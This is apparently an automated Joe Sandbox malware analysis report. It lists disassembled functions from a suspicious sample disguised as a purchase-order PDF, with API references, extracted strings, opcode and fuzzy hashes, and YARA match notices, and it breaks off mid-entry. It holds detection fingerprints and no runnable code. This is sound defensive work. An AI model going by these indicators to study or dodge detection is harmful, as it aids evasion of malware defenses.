String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 7ae1833f145049b7848d1edb09ce3b9f57a108d97dfacd5e5147bd1a4c11b9ce
Instruction ID: 08868adc6165df37fb6fa5d7c169f4731c4d1c65567d472b1218ad71341a1f1b
Opcode Fuzzy Hash: 7ae1833f145049b7848d1edb09ce3b9f57a108d97dfacd5e5147bd1a4c11b9ce
Instruction Fuzzy Hash: 6451E6B2A40116BFCF21EBAD88D097EFBB8BB492417108269F465D7646D334DE54C7A0

Function 017F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017F24A6
___swprintf_l.LIBCMT ref: 017F24E2
___swprintf_l.LIBCMT ref: 017F257D
___swprintf_l.LIBCMT ref: 017F25A3
___swprintf_l.LIBCMT ref: 017F25C8
___swprintf_l.LIBCMT ref: 017F2608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 017F24DA
ffff:, xrefs: 017F247D, 017F249D
:%u.%u.%u.%u, xrefs: 017F25FF
::%hs%u.%u.%u.%u, xrefs: 017F249E

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: dda6a03919379b7b0cb41756f61a4c8abd46452cd3ce40e3d133715d444d8483
Instruction ID: 1596c2b4785c8c3c982f8027c1d0452d35b14cf42449e0944ff956ab659f4e36
Opcode Fuzzy Hash: dda6a03919379b7b0cb41756f61a4c8abd46452cd3ce40e3d133715d444d8483
Instruction Fuzzy Hash: F951E4B5A04645AFCB30DF9CC89497FFBF9AB44200B14849DE696D7743EAB4DE408760

Function 01777630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017B4742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017B4725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017B46FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017B4655
ExecuteOptions, xrefs: 017B46A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 017B4787
Execute=1, xrefs: 017B4713

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 9bfe54830777f03af3fa1814967b34ab9c3a209d35b597cdfa8eb78320cd39bb
Instruction ID: 91f961dc633fd917f8f0b3fd6baa746d6de49d3287e9d9a4f4e0b2df6479ca46
Opcode Fuzzy Hash: 9bfe54830777f03af3fa1814967b34ab9c3a209d35b597cdfa8eb78320cd39bb
Instruction Fuzzy Hash: DC51273160021ABAEF25AAA8DC9DFEDF7A9EF14700F0404EDD606E7185E771AA41CF50

Function 0178B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0178B6BF

Strings

0, xrefs: 0178B695
+, xrefs: 0178B65A
-, xrefs: 0178B650
0, xrefs: 0178B66F

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 2bdb924e8a98359540a3ff5cdbe480304ee58c7143d0b9d212ef819cbbec49eb
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 8281C070ED52499EEF25BE6CC8917FEFFB1AF45320F18425AD861A7291C7349840CB61

Function 0176F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017B02E7
RTL: Re-Waiting, xrefs: 017B031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017B02BD

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 5b66e271366356bad6dbade60253ea6e838aec9612eb468ce68baeee889c2f6c
Instruction ID: 3770acb1b24f27343632d91b40eee8e210bd4aa0781c965920f719e92ee043a8
Opcode Fuzzy Hash: 5b66e271366356bad6dbade60253ea6e838aec9612eb468ce68baeee889c2f6c
Instruction Fuzzy Hash: 52E1BC306087429FE725CF28D898B6AFBE4BB84314F140A6DF9A5CB2E1D774D945CB42

Function 0177BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 017B7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017B7B7F
RTL: Re-Waiting, xrefs: 017B7BAC

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: bc0ee51b286bb0d8e8530b6a84fbeb575f49072fb0f4d3c5e0ef31acb50c8299
Instruction ID: 5616d1ad08291c875c22c0770740849bcaef37bce4b3312d5d3c58e3941b95fd
Opcode Fuzzy Hash: bc0ee51b286bb0d8e8530b6a84fbeb575f49072fb0f4d3c5e0ef31acb50c8299
Instruction Fuzzy Hash: CC41D2313047029FDB25DE29C880B6BF7E5EF99B10F100A1DF95ADB680DB72E9058B91

Function 0177B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017B728C

Strings

RTL: Resource at %p, xrefs: 017B72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017B7294
RTL: Re-Waiting, xrefs: 017B72C1

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 5650a663523127c617626de7634f931487c1dfbfbe733b9497e49e81f3258883
Instruction ID: fb29c71ac14eceef70416ce944fc22694dbd56745c452d59e221feb48284c706
Opcode Fuzzy Hash: 5650a663523127c617626de7634f931487c1dfbfbe733b9497e49e81f3258883
Instruction Fuzzy Hash: 5341DF31608206ABDB25DE29CC81BAAF7B5FB94710F140619F955EB280DB31E8568BD1

Function 017F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017F238D
___swprintf_l.LIBCMT ref: 017F23B3

Strings

]:%u, xrefs: 017F23AA
%%%u, xrefs: 017F2384

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 2eb34fd53f617141f8970c6141823a36d417173e9328cc2eda87a93c2c8fc9da
Instruction ID: 32d9239ffbdffc6ed4ead3484b11b1ece76d5699fe3b7ba1a6b8da4f4bc906b8
Opcode Fuzzy Hash: 2eb34fd53f617141f8970c6141823a36d417173e9328cc2eda87a93c2c8fc9da
Instruction Fuzzy Hash: 1E3188B26005199FDB20DE2DDC40BEFF7F8EF44610F540559E949D3205EB30DA448B61

Function 01787D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01787E8B

Strings

+, xrefs: 01787DE8
-, xrefs: 01787DDD

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 0fecf31477666c9c5bea8b87956f4f3ec3bed69effa4f2fca3ce06a6ab68fbd7
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 8091B671E802169BEB28FF6EC8816BEFBA5EF44320F74451AE956E72C4D7309941C721

Function 01749126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01749175
$, xrefs: 01749191

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: d22e3fedaf551b8fead968f9cbeb5a71fe70070f5d5b2170f60248e07eb8ed55
Instruction ID: 671a2912581ea6952b7d4ab169ebd9a607792257eef1e6d9c83f8ead428daec8
Opcode Fuzzy Hash: d22e3fedaf551b8fead968f9cbeb5a71fe70070f5d5b2170f60248e07eb8ed55
Instruction Fuzzy Hash: C5812D71D002699BDB35CB54CC45BEEB7B8AF48754F1042EAEA19B7640E7705E84CFA0

Analysis Process: ycnUEzgloE.exePID: 1896, Parent PID: 5488COMMON

Executed Functions

Function 04C10379 Relevance: 6.4, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

6, xrefs: 04C1040E
O, xrefs: 04C10407
\, xrefs: 04C10415
s, xrefs: 04C10400
S, xrefs: 04C103F9

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: 6$O$S$\$s
API String ID: 0-3854637164
Opcode ID: 29cfc8e2175923162a8501add7e10335b37fb5d38a0dd1e25dd2a4ae2a3d9ee0
Instruction ID: 3cd769db50473f055c649ac54a409932c36e83e7d20661edaf57e85df408d434
Opcode Fuzzy Hash: 29cfc8e2175923162a8501add7e10335b37fb5d38a0dd1e25dd2a4ae2a3d9ee0
Instruction Fuzzy Hash: BF51D6B2D00258ABDB10DFD5DC88BEAB379EF45315F044299ED0967120E7B46B489BA1

Function 04C1E919 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

a, xrefs: 04C1E971

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: a
API String ID: 0-176469604
Opcode ID: 1c0a0a7c528ab0a5300ffd22e497d70648e94d391095989c573f7bdd55dc421a
Instruction ID: 140cc7d7aea23c138e71bc1e1cf371dc97b397a73c4521f9ad11fcc11416a2f9
Opcode Fuzzy Hash: 1c0a0a7c528ab0a5300ffd22e497d70648e94d391095989c573f7bdd55dc421a
Instruction Fuzzy Hash: C811E2B6D01218AF9B40DFE9DD419EEBBF9EF48200F14456AE919E7240E7716A048BE1

Function 04BFBB4E Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 022c55c224c7e8d114e0434337469af158f2e96d39e5b3eeb2e4a2c562d1a40e
Instruction ID: d0322c23495aa5b3a172e8775ccb0104bfc1756cfc2b874582a094baa3388a74
Opcode Fuzzy Hash: 022c55c224c7e8d114e0434337469af158f2e96d39e5b3eeb2e4a2c562d1a40e
Instruction Fuzzy Hash: EE5188B1D11219AFDB14CF99DC80AEEBBB8EF49710F10415BFA18E7240D7B1A645CBA0

Function 04C20CB9 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbe71a2d3c220e38d08e858fb7f4f1c3281083736f6356d65a8d58f760f0c0da
Instruction ID: 5117efba1d592f11b0418f99cff81b2369490f185f3da10d0d841eca74991dfe
Opcode Fuzzy Hash: dbe71a2d3c220e38d08e858fb7f4f1c3281083736f6356d65a8d58f760f0c0da
Instruction Fuzzy Hash: 05311CB5A00249AFDB14DF99D881EAFB7B9EF88300F10410AFA09A7244D674B915CBA0

Function 04C215F9 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21ec15b269c1d98d01426d6922aa3cdfa75c7d72c18b623870b35c87bec9ca6c
Instruction ID: 5d91326a62053f4a5674ef866a8952994cd6d056d0440d68d30a8a13a11b25b9
Opcode Fuzzy Hash: 21ec15b269c1d98d01426d6922aa3cdfa75c7d72c18b623870b35c87bec9ca6c
Instruction Fuzzy Hash: 63215EB1A00248AFDB10DF99DC41EAFB7B9EF88710F00450AFE189B284D670B951CBA5

Function 04C101B9 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a5b13b2e581cf2a67c77ed094f4b511f8956eea1b2b9428b5ffcd45e5dc176
Instruction ID: a7c1798ddcf9730f77f94b3279208b28559274a3bd4d9959628b573b4b3f7e23
Opcode Fuzzy Hash: 97a5b13b2e581cf2a67c77ed094f4b511f8956eea1b2b9428b5ffcd45e5dc176
Instruction Fuzzy Hash: 211170B23C02197AF720AE569C82FAB376DAB85F14F244015FF08AA2C1D6F5B91156B4

Function 04C1D5D9 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40db638587abd93dd8b8973cbb15edf2874d9d93543011ea8f08df50f984c8cc
Instruction ID: 0be77376653b64733492f339084d5353cfc88e3f235f2d0b61970e906f5fbeb4
Opcode Fuzzy Hash: 40db638587abd93dd8b8973cbb15edf2874d9d93543011ea8f08df50f984c8cc
Instruction Fuzzy Hash: 622103F6D0121DAF9B00DFE9D8419EFB7F9EF48214F04825AE919E7200E7706A05CBA1

Function 04C20979 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42aa4f1915a28a0dcd72f193e0a845860d3b9206d3ed917cb064a2a2af13284a
Instruction ID: f28a00f96f25d8870a6b612bc302a383a8d7104476a85edf96ce711f1dda6a7f
Opcode Fuzzy Hash: 42aa4f1915a28a0dcd72f193e0a845860d3b9206d3ed917cb064a2a2af13284a
Instruction Fuzzy Hash: 62116071900255AFE710EFA9DC42FAFB7ADEB84710F00454AFA199B280D6B07915CBA1

Function 04C20AD9 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee8a1f554d7fbf5e55f972301a2b285ec971ef521f7175a82833323ad68b6fd2
Instruction ID: fe306efa10883424e87b737a0cdd5dd831a920d35af2e37368bd224b76f89fdf
Opcode Fuzzy Hash: ee8a1f554d7fbf5e55f972301a2b285ec971ef521f7175a82833323ad68b6fd2
Instruction Fuzzy Hash: 16115EB1600254AFE710EBA5DC41FAFB7ADEB85700F00454AFA589A284D6B079158BA5

Function 04BFBBAA Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f16d79fc2f26499d054056861a0efc4cc0b8a8dee0a37263f0233843886a5381
Instruction ID: 13ad3bafb937c39cb7dcc099b136b5e90bb2f4e82f0e9d30d40ed0f9a50e10ae
Opcode Fuzzy Hash: f16d79fc2f26499d054056861a0efc4cc0b8a8dee0a37263f0233843886a5381
Instruction Fuzzy Hash: A611ACB1D21229AF8B44DFADD8845DDBBF8FA09620B10855BE858E7240D77096458FD0

Function 04C21959 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b99a4a5aa213c43e4e724ddd4af610961b87da9c8540730c61e1aae46a735713
Instruction ID: a3aee3db1d535fe441db445efb24d2895110c9982034bbcdd3b632ee1550ba8d
Opcode Fuzzy Hash: b99a4a5aa213c43e4e724ddd4af610961b87da9c8540730c61e1aae46a735713
Instruction Fuzzy Hash: 0E01D2B2204108BBCB04DE99DC80EEB77ADEF8C714F008208BA0DE3280D630F8518BA4

Function 04C1D549 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1d98dde2ace18ac3a6fcf7ffa9ad2d5ddaebfe1521665f521096ad5c24e7d7f
Instruction ID: 24cfccfa490f931f80f8e5e216c2d13dd724138b45b027507be3ff3783fcf89a
Opcode Fuzzy Hash: d1d98dde2ace18ac3a6fcf7ffa9ad2d5ddaebfe1521665f521096ad5c24e7d7f
Instruction Fuzzy Hash: 2E01DEF2C1121CAF9B40DFE8D940AEEBBF9EB18604F14456AD515F2200F77056048BA1

Function 04BFBD05 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d38b3fd07c71900a9daf4ac875b6d1debcb8f96ac7347e62098e0e4b993995b
Instruction ID: 07672b736248257242af6e778022583620bb6126d925112e6dd28988ec7a3ee0
Opcode Fuzzy Hash: 8d38b3fd07c71900a9daf4ac875b6d1debcb8f96ac7347e62098e0e4b993995b
Instruction Fuzzy Hash: 5CF0E9776041166FE7105E6EFC80BDAB79CEB84334F240222FA1CC7241D671B46697A0

Function 04BFBD6C Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a7775ab32848df79701c2b1dd8aba3715d8d836b47c41918d5080488c34c0fc
Instruction ID: dfffeba60f6ac268fa46b12a8d4d52fead3d5a71d8fd767d51b87ec086c69f74
Opcode Fuzzy Hash: 1a7775ab32848df79701c2b1dd8aba3715d8d836b47c41918d5080488c34c0fc
Instruction Fuzzy Hash: CEF0E93A55D6928FD70A4E6CFC01195B791EA4233572007EBC5694B691E333A43B6F41

Function 04C20BC9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac8431a1731478fb97ffb0108c4d43d81e7b6e3687383d82fde04f7f7ef6f110
Instruction ID: e62d28c91b3b9dcc4cc3fbc8cfe7c2f16df850814e44a21fd83b054603bb41da
Opcode Fuzzy Hash: ac8431a1731478fb97ffb0108c4d43d81e7b6e3687383d82fde04f7f7ef6f110
Instruction Fuzzy Hash: F1F01CB5200614BBE710EF99DC85FDB77ADEF88711F108149FA5897241D670B9118BB0

Function 04C218C9 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
Instruction ID: ccaa0da8cf75f40a824960cca526b14da5dee373fae96df279a0a7476bdae973
Opcode Fuzzy Hash: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
Instruction Fuzzy Hash: 03E06D76204204BBD610EE99DC40F9B37ADDF89714F004049FA0CA7241C770B9108BB4

Function 04C21879 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
Instruction ID: c0f46c346be22fb28d49a433c4d6edf00a06eb47fe29871fb1d8746930f1e3b9
Opcode Fuzzy Hash: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
Instruction Fuzzy Hash: C2E09ABA200204BBE610EE99DC40F9B77ACEFC9750F004449FA0DAB241D670B8108BB4

Function 04C102D9 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc84cc6ce4685be0d4ad46fc62284313a2e7392da998ddc9dedda31c2de62930
Instruction ID: a344c1ef9eaa067178e7523de4f368b5b12f26ce8f9f981dd03815f15a5cba98
Opcode Fuzzy Hash: dc84cc6ce4685be0d4ad46fc62284313a2e7392da998ddc9dedda31c2de62930
Instruction Fuzzy Hash: FFF08271805208EBDB14CFA5D841BDDBBB5EB05320F2083AAE825DB280E634A7909781

Function 04C236D9 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d216927ff45b877f951f5ebed4874dc4d6dec4fa62210825f3a2c1accb214f
Instruction ID: 32c8e663360db0a319fb6b554199af41cc35044450bada9ffa22f1cacadbfda1
Opcode Fuzzy Hash: a3d216927ff45b877f951f5ebed4874dc4d6dec4fa62210825f3a2c1accb214f
Instruction Fuzzy Hash: 72E02672A0033033D62055999E09F9777ADDBC0F60F090024FE0C9B310E9F8BA0082E0

Function 04C102D6 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67a56602929b428a32801bd1afbbf27e93bd938288743ba243cb4b21f9205fe
Instruction ID: 8aaab5efb4e3bffcbbb8c72c58da662f99209759eeb52021d1b08b0d26813a2d
Opcode Fuzzy Hash: b67a56602929b428a32801bd1afbbf27e93bd938288743ba243cb4b21f9205fe
Instruction Fuzzy Hash: A3E02270805108EBDB04CFA4E881BEDBBB4EB04310F1083AAE919DB280E234D790A780

Function 04C21569 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
Instruction ID: f4b86f863ab5c8cecac5d182aebef0fb222f8d93b5577400505412ac358bb364
Opcode Fuzzy Hash: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
Instruction Fuzzy Hash: 70E04636200214BBE620AA6ADC41FDB776CEFC5754F008455FA0CA7281C6B0B9158BF0

Function 04C235F9 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a307b9234a7a76751f8ef33bf905eb7db0baf455417a6ac040e8c5995451c3c1
Instruction ID: 73b883fa364c980b17b9ca63f3d14a7a9f9edf11b350b94f9e111e659d7b00a1
